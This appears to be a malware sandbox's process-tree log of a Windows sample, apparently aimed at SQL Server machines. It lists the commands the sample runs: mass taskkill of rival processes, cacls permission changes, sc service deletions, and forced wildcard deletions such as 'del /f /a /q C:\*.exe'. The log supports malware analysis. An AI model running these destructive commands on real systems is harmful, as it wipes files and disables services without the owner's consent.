C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\taskger.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\taskger.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgzr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\vget.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\vget.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im assm.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im assm.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls assm.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls assm.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies GthUdTask"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls assm.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls assm.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SqlManagement.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SqlManagement.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SqlManagement.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemManagement.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SqlManagement.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SqlManagement.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SystemManagement.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SystemManagement.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SystemManagement.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SystemManagement.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls msinfo.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls msinfo.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im msinfo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im rundlls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rundlls.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls msinfo.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls msinfo.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls OmdBase.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls OmdBase.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls System.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls System.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im System.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im System.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im OmdBase.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OmdBase.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spoolys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolys.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls System.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls System.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows DVD Maker"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows DVD Maker"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows DVD Maker"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows DVD Maker"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im GthUdTask.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im BthUdTask.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies BthUdTask"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies BthUdTask"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SvidaPctb.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies WavesSys"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies WavesSys"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies WavesSys"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies WavesSys"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im WavesSys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WavesSys.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im System.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im System.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Nvdxgiwrap"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Nvdxgiwrap"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Rsytvcem"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Rsytvcem"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Rsytvcem"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Rsytvcem"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Nvdxgiwrap"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Nvdxgiwrap"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdxgiwrap.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdxgiwrap.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies BthUdTask"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rsytvcp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies GthUdTask"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies GthUdTask"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls OmdBase.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls conhoy.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls conhoy.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls rundlls.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls rundlls.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Systen64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spoolys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolys.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Help\spoolys.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im lsma12.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsma12.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\INF\aspnet\lsma12.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im assm.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im assm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlcmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhos.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhos.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhou.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhou.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im m6.bin.bin.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im m6.bin.bin.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im javaw.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im javaw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im clsso.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im clsso.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoz.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im csrs.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im csrs.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sysdo.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysdo.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sysdo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysdo.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SqlManagement.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sSqlManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemManagement.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskmgr.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.bat2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.ini2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/*.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.ini2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.json2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.bat2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.txt2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/*.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wscript.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wscript.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWD.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWA.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWB.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWB.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWC.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENAC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENAC.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTC.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTC.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f3⤵
-
